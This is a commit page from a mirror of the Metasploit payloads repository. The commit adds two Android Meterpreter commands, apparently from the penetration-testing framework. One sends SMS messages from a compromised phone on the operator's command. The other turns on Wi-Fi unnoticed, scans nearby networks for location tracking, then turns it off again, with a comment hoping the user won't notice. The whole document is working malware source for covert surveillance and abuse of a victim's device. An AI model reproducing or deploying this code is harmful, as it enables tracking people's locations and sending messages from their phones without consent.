github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2025-04-24 10:09:49 +02:00
Code Releases Activity

send_sms + wlan_geolocate

Browse Source
This commit is contained in:
Joao Pena Gil 2015-07-19 22:59:59 +01:00
parent 5700d04431
commit e157b4e3cf
3 changed files with 216 additions and 0 deletions
java/androidpayload/library/src/com/metasploit/meterpreter
AndroidMeterpreter.java
android
send_sms_android.javawlan_geolocate.java

4
java/androidpayload/library/src/com/metasploit/meterpreter/AndroidMeterpreter.java

@ -4,6 +4,8 @@ import android.content.Context;
import android.os.Handler;
import android.os.Looper;
import com.metasploit.meterpreter.wlan_geolocate;
import com.metasploit.meterpreter.android.send_sms_android;
import com.metasploit.meterpreter.android.check_root_android;
import com.metasploit.meterpreter.android.dump_calllog_android;
import com.metasploit.meterpreter.android.dump_contacts_android;
@ -145,6 +147,8 @@ public class AndroidMeterpreter extends Meterpreter {
mgr.registerCommand("geolocate", geolocate_android.class);
mgr.registerCommand("dump_calllog", dump_calllog_android.class);
mgr.registerCommand("check_root", check_root_android.class);
mgr.registerCommand("send_sms", send_sms_android.class);
mgr.registerCommand("wlan_geolocate", wlan_geolocate.class);
}
return getCommandManager().getNewCommands();
}

109
java/androidpayload/library/src/com/metasploit/meterpreter/android/send_sms_android.java Normal file

@ -0,0 +1,109 @@
package com.metasploit.meterpreter.android;
import android.telephony.SmsManager;
import android.app.PendingIntent;
import android.content.BroadcastReceiver;
import android.content.Intent;
import android.content.IntentFilter;
import android.app.Activity;
import android.content.Context;
import com.metasploit.meterpreter.AndroidMeterpreter;
import com.metasploit.meterpreter.Meterpreter;
import com.metasploit.meterpreter.TLVPacket;
import com.metasploit.meterpreter.command.Command;
public class send_sms_android implements Command {
private static final int TLV_EXTENSIONS = 20000;
private static final int TLV_TYPE_SMS_ADDRESS = TLVPacket.TLV_META_TYPE_STRING
| (TLV_EXTENSIONS + 9001);
private static final int TLV_TYPE_SMS_BODY = TLVPacket.TLV_META_TYPE_STRING
| (TLV_EXTENSIONS + 9002);
private static final int TLV_TYPE_SMS_SENT = TLVPacket.TLV_META_TYPE_BOOL
| (TLV_EXTENSIONS + 9021);
private static final String address = "address";
private static final String body = "body";
@Override
public int execute(Meterpreter meterpreter, TLVPacket request,
TLVPacket response) throws Exception {
String number = request.getStringValue(TLV_TYPE_SMS_ADDRESS);
String message = request.getStringValue(TLV_TYPE_SMS_BODY);
SmsManager sm = SmsManager.getDefault();
if (message.length() > 160) {
}
else {
String SMS_SENT = "SMS_SENT";
String SMS_DELIVERED = "SMS_DELIVERED";
AndroidMeterpreter androidMeterpreter = (AndroidMeterpreter) meterpreter;
final Context context = androidMeterpreter.getContext();
PendingIntent sentPendingIntent = PendingIntent.getBroadcast(context, 0, new Intent(SMS_SENT), 0);
PendingIntent deliveredPendingIntent = PendingIntent.getBroadcast(context, 0, new Intent(SMS_DELIVERED), 0);
// For when the SMS has been sent
context.registerReceiver(new BroadcastReceiver() {
@Override
public void onReceive(Context context, Intent intent) {
String result = "";
switch(getResultCode()) {
case Activity.RESULT_OK:
result = "Transmission successful";
break;
case SmsManager.RESULT_ERROR_GENERIC_FAILURE:
result = "Transmission failed";
break;
case SmsManager.RESULT_ERROR_RADIO_OFF:
result = "Radio off";
break;
case SmsManager.RESULT_ERROR_NULL_PDU:
result = "No PDU defined";
break;
case SmsManager.RESULT_ERROR_NO_SERVICE:
result = "No service";
break;
}
}
}, new IntentFilter(SMS_SENT));
// For when the SMS has been delivered
context.registerReceiver(new BroadcastReceiver() {
@Override
public void onReceive(Context context, Intent intent) {
String result = "";
switch(getResultCode()) {
case Activity.RESULT_OK:
result = "Transmission successful";
break;
case SmsManager.RESULT_ERROR_GENERIC_FAILURE:
result = "Transmission failed";
break;
case SmsManager.RESULT_ERROR_RADIO_OFF:
result = "Radio off";
break;
case SmsManager.RESULT_ERROR_NULL_PDU:
result = "No PDU defined";
break;
case SmsManager.RESULT_ERROR_NO_SERVICE:
result = "No service";
break;
}
}
}, new IntentFilter(SMS_DELIVERED));
// Get the default instance of SmsManager
SmsManager smsManager = SmsManager.getDefault();
// Send a text based SMS
smsManager.sendTextMessage(number, null, message, sentPendingIntent, deliveredPendingIntent);
// smsManager.sendTextMessage(number, null, message, null, null);
response.addOverflow(TLV_TYPE_SMS_SENT, true);
}
return ERROR_SUCCESS;
}
}

103
java/androidpayload/library/src/com/metasploit/meterpreter/android/wlan_geolocate.java Normal file

@ -0,0 +1,103 @@
package com.metasploit.meterpreter;
import java.util.List;
import android.app.Activity;
import android.os.Handler;
import android.content.BroadcastReceiver;
import android.content.Context;
import android.content.Intent;
import android.content.IntentFilter;
import android.net.wifi.ScanResult;
import android.net.wifi.WifiManager;
import android.os.Bundle;
import android.view.Menu;
import android.view.MenuItem;
import android.widget.TextView;
import android.widget.Toast;
import android.util.Log;
import com.metasploit.meterpreter.AndroidMeterpreter;
import com.metasploit.meterpreter.Meterpreter;
import com.metasploit.meterpreter.TLVPacket;
import com.metasploit.meterpreter.command.Command;
public class wlan_geolocate implements Command {
private static final int TLV_EXTENSIONS = 20000;
private static final int TLV_TYPE_WLAN_GROUP = TLVPacket.TLV_META_TYPE_GROUP
| (TLV_EXTENSIONS + 9022);
private static final int TLV_TYPE_WLAN_BSSID = TLVPacket.TLV_META_TYPE_STRING
| (TLV_EXTENSIONS + 9023);
private static final int TLV_TYPE_WLAN_SSID = TLVPacket.TLV_META_TYPE_STRING
| (TLV_EXTENSIONS + 9024);
private static final int TLV_TYPE_WLAN_LEVEL = TLVPacket.TLV_META_TYPE_UINT
| (TLV_EXTENSIONS + 9025);
WifiManager mainWifi;
WifiReceiver receiverWifi;
List<ScanResult> wifiList;
Object scanready = new Object();
boolean WifiStatus;
class WifiReceiver extends BroadcastReceiver {
// This method call when number of wifi connections changed
@Override
public void onReceive(Context c, Intent intent) {
synchronized (scanready){
wifiList = mainWifi.getScanResults();
scanready.notifyAll();
}
}
}
@Override
public int execute(Meterpreter meterpreter, TLVPacket request,
TLVPacket response) throws Exception {
AndroidMeterpreter androidMeterpreter = (AndroidMeterpreter) meterpreter;
final Context context = androidMeterpreter.getContext();
mainWifi = (WifiManager) context.getSystemService(context.WIFI_SERVICE);
WifiStatus=mainWifi.isWifiEnabled();
if (WifiStatus == false)
{
// If wifi is disabled, enable it
mainWifi.setWifiEnabled(true);
}
receiverWifi = new WifiReceiver();
context.registerReceiver(receiverWifi, new IntentFilter(WifiManager.SCAN_RESULTS_AVAILABLE_ACTION));
mainWifi.startScan();
wifiList=null;
synchronized (scanready){
while(wifiList == null) {
// Log.i("AAA","Waiting for scan results..");
scanready.wait(1000);
}
//If wifi was disabled when process started, turn it off again
//hopefully fast-enough that user won't notice =)
if (WifiStatus == false){
mainWifi.setWifiEnabled(false);
}
for(int i = 0; i < wifiList.size(); i++){
TLVPacket pckt=new TLVPacket();
pckt.addOverflow(TLV_TYPE_WLAN_SSID,wifiList.get(i).SSID);
pckt.addOverflow(TLV_TYPE_WLAN_BSSID,wifiList.get(i).BSSID);
int level=0;
level = mainWifi.calculateSignalLevel(wifiList.get(i).level,100);
pckt.addOverflow(TLV_TYPE_WLAN_LEVEL,level);
response.addOverflow(TLV_TYPE_WLAN_GROUP, pckt);
}
}
return ERROR_SUCCESS;
}
}